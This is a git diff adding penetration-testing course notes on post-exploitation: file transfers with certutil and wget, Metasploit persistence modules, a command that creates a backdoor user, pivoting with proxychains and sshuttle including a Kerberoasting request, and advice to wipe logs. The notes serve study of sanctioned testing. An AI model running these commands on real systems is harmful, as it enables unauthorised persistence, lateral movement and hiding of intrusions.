Network attacks done

peh/5-post-exploitation/README.md

@@ -1 +1,94 @@
-# 5. Post Exploitation
+# 5. Post Exploitation
+
+## File transfers
+
+```bash
+# HTTP via Python
+python3 -m http.server 80
+
+# Windows - Certutil
+certutil.exe -urlcache -f <URL-TO-FILE>
+
+# Linux
+wget <URL>
+
+...
+```
+
+---
+
+## Maintain access
+
+➡️ **Maintaining access** during a penetration test refers to the techniques used to **retain control over a compromised system** for extended periods, even after reboots or security updates. This is a crucial phase in **post-exploitation**, allowing testers to simulate real-world attacker **persistence** and assess an organization's ability to detect and respond to such threats.
+
+**Metasploit persistence methods**
+
+1. **Persistence scripts:**
+   - `run persistence -h` → Displays available persistence options.
+   - `exploit/windows/local/persistence` → Creates a **backdoor** using Metasploit.
+   - `exploit/windows/local/registry_persistence` → Modifies **Windows Registry** for persistence.
+2. **Scheduled Tasks:**
+   - `run scheduleme` → Creates a **scheduled task** to execute payloads periodically.
+   - `run schtaskabuse` → **Abuses schtasks** to maintain system access.
+3. **User Account Manipulation:**
+   - `net user hacker password123 /add` → Creates a **new user account** for persistent access.
+
+These techniques help attackers maintain **long-term access** even after a system reboot or network disconnection. Monitoring scheduled tasks, registry changes, and unauthorized user accounts is crucial to detecting and preventing persistence mechanisms.
+
+---
+
+## Pivoting
+
+➡️ **Pivoting** is a technique used in penetration testing to **move laterally** within a network after compromising an initial system. It allows an attacker to **route traffic through the compromised machine** to access other internal systems that are otherwise unreachable from the external network.
+
+### proxychains
+
+➡️ [proxychains](https://github.com/haad/proxychains) - tool that forces any TCP connection initiated by an application to route through user-defined proxy servers, such as TOR or other SOCKS4, SOCKS5, or HTTP(S) proxies
+
+```bash
+cat /etc/proxychains4.conf
+# check socks4 port
+
+ssh -f -N -D 9050 -i pivot <USER>@<VICTIM-IP>
+
+# e.g. pivoting
+proxychains nmap -p <PORT> <VICTIM-IP>
+
+proxychains GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip <IP> -request
+
+proxychains xfreerdp /u:administrator /p:'p@ssword' /v:<IP>
+
+proxychains firefox
+```
+
+### sshuttle
+
+➡️ [sshuttle](https://github.com/sshuttle/sshuttle) - transparent proxy server that forwards over SSH, supports DNS tunneling
+
+```bash
+sshuttle -r <USER>@<IP> <NEW-NETWORK/24> --ssh-cmd "ssh -i pivot"
+# keep this terminal open
+# run commands in other terminals
+```
+
+### chisel
+
+➡️ [chisel](https://github.com/jpillora/chisel) - a fast TCP/UDP tunnel, transported over HTTP, secured via SSH
+
+---
+
+## Cleaning up
+
+➡️ The **cleanup phase** is the final step in a penetration test, ensuring that **no traces** of testing activities remain on the target system or network.
+
+The goal is to restore the environment to its original state before the test, minimizing security risks and avoiding any disruption.
+
+- **Remove files** – Delete scripts, executables, and added files
+- **Eliminate persistence** – Remove malware, backdoors, tasks, and added user accounts
+- **Restore settings** – Revert settings, security configs, firewall rules, and permissions.
+- **Clear tracks** – Wipe command history and logs.
+
+📌 From a hacker perspective, you need to "**make it look like you were never there**".
+
+---
+

peh/peh-references.md

@@ -207,7 +207,9 @@
 
 ## Post Exploitation
 
-
+- [proxychains](https://github.com/haad/proxychains)
+- [sshuttle](https://github.com/sshuttle/sshuttle)
+- [chisel](https://github.com/jpillora/chisel)
 
 ## Web Application